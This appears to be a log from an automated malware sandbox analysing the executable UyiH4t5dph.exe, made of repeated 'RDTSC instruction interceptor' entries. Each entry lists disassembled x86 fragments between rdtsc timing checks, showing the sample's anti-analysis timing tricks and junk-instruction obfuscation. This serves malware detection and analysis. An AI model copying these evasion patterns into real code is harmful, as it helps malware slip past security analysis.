                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5440899 second address: 544089F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 544089F second address: 54408A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54408A3 second address: 5440939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a call 00007FE6E8F184C1h 0x0000000f call 00007FE6E8F184C0h 0x00000014 pop esi 0x00000015 pop edx 0x00000016 mov ch, BDh 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b push edi 0x0000001c pushfd 0x0000001d jmp 00007FE6E8F184C4h 0x00000022 jmp 00007FE6E8F184C5h 0x00000027 popfd 0x00000028 pop esi 0x00000029 push eax 0x0000002a push edx 0x0000002b pushfd 0x0000002c jmp 00007FE6E8F184C7h 0x00000031 add ah, FFFFFFFEh 0x00000034 jmp 00007FE6E8F184C9h 0x00000039 popfd 0x0000003a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5440939 second address: 5440956 instructions: 0x00000000 rdtsc 0x00000002 call 00007FE6E8B29090h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5440956 second address: 544095A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 544095A second address: 5440981 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007FE6E8B29094h 0x0000000c pop eax 0x0000000d popad 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov ax, A9E9h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5440981 second address: 5440986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5440986 second address: 544098C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 544098C second address: 5440990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5440761 second address: 5440770 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B2908Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 544043C second address: 5440441 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5440441 second address: 5440447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5450312 second address: 5450362 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE6E8F184C7h 0x00000009 or ch, 0000003Eh 0x0000000c jmp 00007FE6E8F184C9h 0x00000011 popfd 0x00000012 movzx esi, di 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FE6E8F184BFh 0x00000020 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5450362 second address: 54503B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FE6E8B29095h 0x0000000b adc ah, FFFFFFD6h 0x0000000e jmp 00007FE6E8B29091h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov dword ptr [esp], ebp 0x0000001a jmp 00007FE6E8B2908Eh 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FE6E8B2908Ah 0x0000002a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54503B6 second address: 54503BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54503BA second address: 54503C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54503C0 second address: 54503FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FE6E8F184BDh 0x00000013 sub si, 4D46h 0x00000018 jmp 00007FE6E8F184C1h 0x0000001d popfd 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5480DD9 second address: 5480DDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5480DDF second address: 5480DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5480DE3 second address: 5480DFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B2908Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov dh, ACh 0x00000011 mov dx, ax 0x00000014 popad 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5480DFE second address: 5480E34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FE6E8F184C1h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5480E34 second address: 5480E47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B2908Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5480E47 second address: 5480E4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5480E4C second address: 5480E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ah, bl 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5480E5D second address: 5480E61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5480E61 second address: 5480E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54604D8 second address: 54604F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FE6E8F184C6h 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54604F4 second address: 5460519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FE6E8B2908Eh 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FE6E8B2908Ah 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5460519 second address: 5460528 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5460528 second address: 54605D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B29099h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FE6E8B2908Eh 0x00000010 mov eax, dword ptr [ebp+08h] 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FE6E8B2908Eh 0x0000001a or ch, FFFFFFC8h 0x0000001d jmp 00007FE6E8B2908Bh 0x00000022 popfd 0x00000023 push eax 0x00000024 movsx ebx, si 0x00000027 pop esi 0x00000028 popad 0x00000029 and dword ptr [eax], 00000000h 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007FE6E8B29098h 0x00000035 or ax, B258h 0x0000003a jmp 00007FE6E8B2908Bh 0x0000003f popfd 0x00000040 pushfd 0x00000041 jmp 00007FE6E8B29098h 0x00000046 or eax, 63013CB8h 0x0000004c jmp 00007FE6E8B2908Bh 0x00000051 popfd 0x00000052 popad 0x00000053 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54605D9 second address: 5460600 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax+04h], 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5460600 second address: 5460604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5460604 second address: 5460617 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5440663 second address: 5440681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE6E8B29095h 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5440681 second address: 54406E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE6E8F184C7h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007FE6E8F184BFh 0x00000013 xchg eax, ebp 0x00000014 jmp 00007FE6E8F184C6h 0x00000019 mov ebp, esp 0x0000001b jmp 00007FE6E8F184C0h 0x00000020 pop ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54406E0 second address: 54406E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5460111 second address: 546015A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007FE6E8F184BEh 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FE6E8F184C7h 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5460311 second address: 5460315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5460315 second address: 546031B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 546031B second address: 546032E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE6E8B2908Fh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 546032E second address: 5460360 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a call 00007FE6E8F184BBh 0x0000000f mov edi, ecx 0x00000011 pop eax 0x00000012 mov ch, bh 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FE6E8F184C3h 0x0000001e rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5460360 second address: 5460366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5460366 second address: 546036A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 546036A second address: 546036E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5480692 second address: 54806AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE6E8F184C7h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54806AD second address: 54806B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54806B1 second address: 5480705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007FE6E8F184C2h 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 jmp 00007FE6E8F184BDh 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a jmp 00007FE6E8F184BEh 0x0000001f xchg eax, ecx 0x00000020 jmp 00007FE6E8F184C0h 0x00000025 push eax 0x00000026 pushad 0x00000027 mov esi, edi 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5480705 second address: 5480737 instructions: 0x00000000 rdtsc 0x00000002 call 00007FE6E8B2908Fh 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xchg eax, ecx 0x0000000c jmp 00007FE6E8B2908Fh 0x00000011 mov eax, dword ptr [775165FCh] 0x00000016 pushad 0x00000017 mov edi, eax 0x00000019 pushad 0x0000001a mov al, B1h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5480737 second address: 54807AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 test eax, eax 0x00000008 jmp 00007FE6E8F184BFh 0x0000000d je 00007FE75AF2B6CEh 0x00000013 jmp 00007FE6E8F184C6h 0x00000018 mov ecx, eax 0x0000001a pushad 0x0000001b call 00007FE6E8F184BEh 0x00000020 pushad 0x00000021 popad 0x00000022 pop esi 0x00000023 mov di, 92E4h 0x00000027 popad 0x00000028 xor eax, dword ptr [ebp+08h] 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FE6E8F184C6h 0x00000032 sub ah, FFFFFF98h 0x00000035 jmp 00007FE6E8F184BBh 0x0000003a popfd 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54807AF second address: 54807C4 instructions: 0x00000000 rdtsc 0x00000002 mov eax, edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 and ecx, 1Fh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov edi, eax 0x0000000f mov esi, 203F6B5Bh 0x00000014 popad 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54807C4 second address: 5480828 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 pushfd 0x00000007 jmp 00007FE6E8F184C3h 0x0000000c xor cl, FFFFFFBEh 0x0000000f jmp 00007FE6E8F184C9h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 ror eax, cl 0x0000001a jmp 00007FE6E8F184BEh 0x0000001f leave 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FE6E8F184C7h 0x00000027 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5480828 second address: 5480831 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 0C8Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5480831 second address: 5480842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 retn 0004h 0x0000000a nop 0x0000000b mov esi, eax 0x0000000d lea eax, dword ptr [ebp-08h] 0x00000010 xor esi, dword ptr [00332014h] 0x00000016 push eax 0x00000017 push eax 0x00000018 push eax 0x00000019 lea eax, dword ptr [ebp-10h] 0x0000001c push eax 0x0000001d call 00007FE6EE0A8C31h 0x00000022 push FFFFFFFEh 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 push ebx 0x00000028 pop eax 0x00000029 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5480842 second address: 5480860 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B2908Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov bx, ax 0x0000000c popad 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5480860 second address: 5480864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5480864 second address: 5480868 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5480868 second address: 548086E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 548086E second address: 54808A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B29096h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ret 0x0000000a nop 0x0000000b push eax 0x0000000c call 00007FE6EDCB9848h 0x00000011 mov edi, edi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FE6E8B29097h 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54808A4 second address: 54808AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54808AA second address: 54808AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 543005B second address: 5430089 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ax, di 0x0000000e push edi 0x0000000f mov edx, esi 0x00000011 pop eax 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5430089 second address: 543008D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 543008D second address: 5430093 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5430093 second address: 543013E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE6E8B2908Bh 0x00000009 add si, 0B1Eh 0x0000000e jmp 00007FE6E8B29099h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FE6E8B29090h 0x0000001a sbb eax, 19515918h 0x00000020 jmp 00007FE6E8B2908Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 mov ebp, esp 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FE6E8B29094h 0x00000032 adc eax, 0B6F4378h 0x00000038 jmp 00007FE6E8B2908Bh 0x0000003d popfd 0x0000003e popad 0x0000003f and esp, FFFFFFF8h 0x00000042 pushad 0x00000043 mov cl, bl 0x00000045 pushfd 0x00000046 jmp 00007FE6E8B2908Ch 0x0000004b adc cx, DDD8h 0x00000050 jmp 00007FE6E8B2908Bh 0x00000055 popfd 0x00000056 popad 0x00000057 xchg eax, ecx 0x00000058 pushad 0x00000059 push eax 0x0000005a push edx 0x0000005b mov dx, cx 0x0000005e rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 543013E second address: 543017C instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov edx, 1341C09Eh 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f mov ecx, 7B1F6011h 0x00000014 mov ecx, 2288EC4Dh 0x00000019 popad 0x0000001a xchg eax, ecx 0x0000001b jmp 00007FE6E8F184C8h 0x00000020 xchg eax, ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov di, ACB0h 0x00000028 mov bh, E3h 0x0000002a popad 0x0000002b rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 543017C second address: 54301EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, D274h 0x00000007 jmp 00007FE6E8B2908Dh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FE6E8B29097h 0x00000017 adc cx, C0BEh 0x0000001c jmp 00007FE6E8B29099h 0x00000021 popfd 0x00000022 push eax 0x00000023 push edx 0x00000024 pushfd 0x00000025 jmp 00007FE6E8B2908Eh 0x0000002a and ecx, 144D31B8h 0x00000030 jmp 00007FE6E8B2908Bh 0x00000035 popfd 0x00000036 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54301EF second address: 5430280 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 766345EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebx 0x0000000b jmp 00007FE6E8F184C2h 0x00000010 mov ebx, dword ptr [ebp+10h] 0x00000013 jmp 00007FE6E8F184C0h 0x00000018 xchg eax, esi 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FE6E8F184BEh 0x00000020 jmp 00007FE6E8F184C5h 0x00000025 popfd 0x00000026 mov si, 6FA7h 0x0000002a popad 0x0000002b push eax 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f pushfd 0x00000030 jmp 00007FE6E8F184C9h 0x00000035 xor cx, A9C6h 0x0000003a jmp 00007FE6E8F184C1h 0x0000003f popfd 0x00000040 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5430280 second address: 543031A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE6E8B2908Eh 0x0000000b popad 0x0000000c xchg eax, esi 0x0000000d pushad 0x0000000e mov cl, C9h 0x00000010 mov edi, 753DD0FEh 0x00000015 popad 0x00000016 mov esi, dword ptr [ebp+08h] 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FE6E8B2908Bh 0x00000020 or ch, FFFFFFAEh 0x00000023 jmp 00007FE6E8B29099h 0x00000028 popfd 0x00000029 pushfd 0x0000002a jmp 00007FE6E8B29090h 0x0000002f add ah, 00000028h 0x00000032 jmp 00007FE6E8B2908Bh 0x00000037 popfd 0x00000038 popad 0x00000039 xchg eax, edi 0x0000003a jmp 00007FE6E8B29096h 0x0000003f push eax 0x00000040 jmp 00007FE6E8B2908Bh 0x00000045 xchg eax, edi 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 pushad 0x0000004a popad 0x0000004b mov si, dx 0x0000004e popad 0x0000004f rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 543031A second address: 5430338 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE6E8F184BAh 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5430338 second address: 5430347 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B2908Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
